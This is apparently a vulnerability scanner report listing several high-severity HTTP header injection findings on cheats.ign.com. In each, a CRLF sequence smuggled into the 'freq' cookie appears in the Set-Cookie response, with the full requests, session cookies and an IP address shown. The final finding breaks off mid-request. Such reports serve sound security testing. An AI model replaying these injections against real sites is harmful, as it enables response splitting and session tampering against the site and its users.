The value of the freq cookie is copied into the Set-Cookie response header. The payload 56159%0d%0a508198ab64e was submitted in the freq cookie. This caused a response containing an injected HTTP header.

Request

GET /index/pc-cheats/index.html HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~056159%0d%0a508198ab64e; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:46:17 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297043177669v-2n-12mc+1297043177669mv+2mn+12wwe~056159
508198ab64e
;Path=/;Domain=.ign.com
Content-Length: 145295

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...

2.6. http://cheats.ign.com/index/playstation-3-cheats/index.html [freq cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /index/playstation-3-cheats/index.html

Issue detail

The value of the freq cookie is copied into the Set-Cookie response header. The payload f5a88%0d%0a5c3c4fff70e was submitted in the freq cookie. This caused a response containing an injected HTTP header.

Request

GET /index/playstation-3-cheats/index.html HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0f5a88%0d%0a5c3c4fff70e; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:46:19 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297043179730v-2n-12mc+1297043179730mv+2mn+12wwe~0f5a88
5c3c4fff70e
;Path=/;Domain=.ign.com
Content-Length: 150425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...

2.7. http://cheats.ign.com/index/playstation-portable-cheats/index.html [freq cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /index/playstation-portable-cheats/index.html

Issue detail

The value of the freq cookie is copied into the Set-Cookie response header. The payload c65be%0d%0a7d7e2e5c849 was submitted in the freq cookie. This caused a response containing an injected HTTP header.

Request

GET /index/playstation-portable-cheats/index.html HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0c65be%0d%0a7d7e2e5c849; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:46:30 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297043190459v-2n-12mc+1297043190459mv+2mn+12wwe~0c65be
7d7e2e5c849
;Path=/;Domain=.ign.com
Content-Length: 138667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...

2.8. http://cheats.ign.com/index/wii-cheats/index.html [freq cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /index/wii-cheats/index.html

Issue detail

The value of the freq cookie is copied into the Set-Cookie response header. The payload aa9fc%0d%0afede6d5931a was submitted in the freq cookie. This caused a response containing an injected HTTP header.

Request

GET /index/wii-cheats/index.html HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0aa9fc%0d%0afede6d5931a; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:46:12 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297043172863v-2n-12mc+1297043172863mv+2mn+12wwe~0aa9fc
fede6d5931a
;Path=/;Domain=.ign.com
Content-Length: 147952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...

2.9. http://cheats.ign.com/index/xbox-360-cheats/index.html [freq cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /index/xbox-360-cheats/index.html

Issue detail

The value of the freq cookie is copied into the Set-Cookie response header. The payload ad4ae%0d%0a24a8ec93866 was submitted in the freq cookie. This caused a response containing an injected HTTP header.

Request

GET /index/xbox-360-cheats/index.html HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0ad4ae%0d%0a24a8ec93866; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:46:13 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297043174012v-2n-12mc+1297043174012mv+2mn+12wwe~0ad4ae
24a8ec93866
;Path=/;Domain=.ign.com
Content-Length: 156023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...

2.10. http://cheats.ign.com/ob2/068/001/001317.html [freq cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /ob2/068/001/001317.html

Issue detail

The value of the freq cookie is copied into the Set-Cookie response header. The payload 3a6ea%0d%0aaec4be26322 was submitted in the freq cookie. This caused a response containing an injected HTTP header.

Request

GET /ob2/068/001/001317.html HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~03a6ea%0d%0aaec4be26322; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:46:54 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297043214917v-2n-12mc+1297043214917mv+2mn+12wwe~03a6ea
aec4be26322
;Path=/;Domain=.ign.com
Content-Length: 114774

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...

2.11. http://cheats.ign.com/ob2/068/038/038020.html [freq cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /ob2/068/038/038020.html

Issue detail

The value of the freq cookie is copied into the Set-Cookie response header. The payload f38fc%0d%0ac9f2bbd217d was submitted in the freq cookie. This caused a response containing an injected HTTP header.

Request

GET /ob2/068/038/038020.html HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0f38fc%0d%0ac9f2bbd217d; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:46:39 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297043199955v-2n-12mc+1297043199955mv+2mn+12wwe~0f38fc
c9f2bbd217d
;Path=/;Domain=.ign.com
Content-Length: 109217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...

2.12. http://cheats.ign.com/ob2/068/077/077644.html [freq cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /ob2/068/077/077644.html

Issue detail

The value of the freq cookie is copied into the Set-Cookie response header. The payload 889f8%0d%0ac563b0c4050 was submitted in the freq cookie. This caused a response containing an injected HTTP header.

Request

GET /ob2/068/077/077644.html HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0889f8%0d%0ac563b0c4050; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:46:37 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297043197639v-2n-12mc+1297043197639mv+2mn+12wwe~0889f8
c563b0c4050
;Path=/;Domain=.ign.com
Content-Length: 111536

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...

2.13. http://cheats.ign.com/ob2/068/077/077723.html [freq cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /ob2/068/077/077723.html

Issue detail

The value of the freq cookie is copied into the Set-Cookie response header. The payload 2bd7e%0d%0ad27f0c4305a was submitted in the freq cookie. This caused a response containing an injected HTTP header.

Request

GET /ob2/068/077/077723.html HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~02bd7e%0d%0ad27f0c4305a; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:46:41 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297043201929v-2n-12mc+1297043201929mv+2mn+12wwe~02bd7e
d27f0c4305a
;Path=/;Domain=.ign.com
Content-Length: 108950

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...

2.14. http://cheats.ign.com/ob2/068/142/14235018.html [freq cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /ob2/068/142/14235018.html

Issue detail

The value of the freq cookie is copied into the Set-Cookie response header. The payload 586ea%0d%0aa1bd0260909 was submitted in the freq cookie. This caused a response containing an injected HTTP header.

Request

GET /ob2/068/142/14235018.html HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
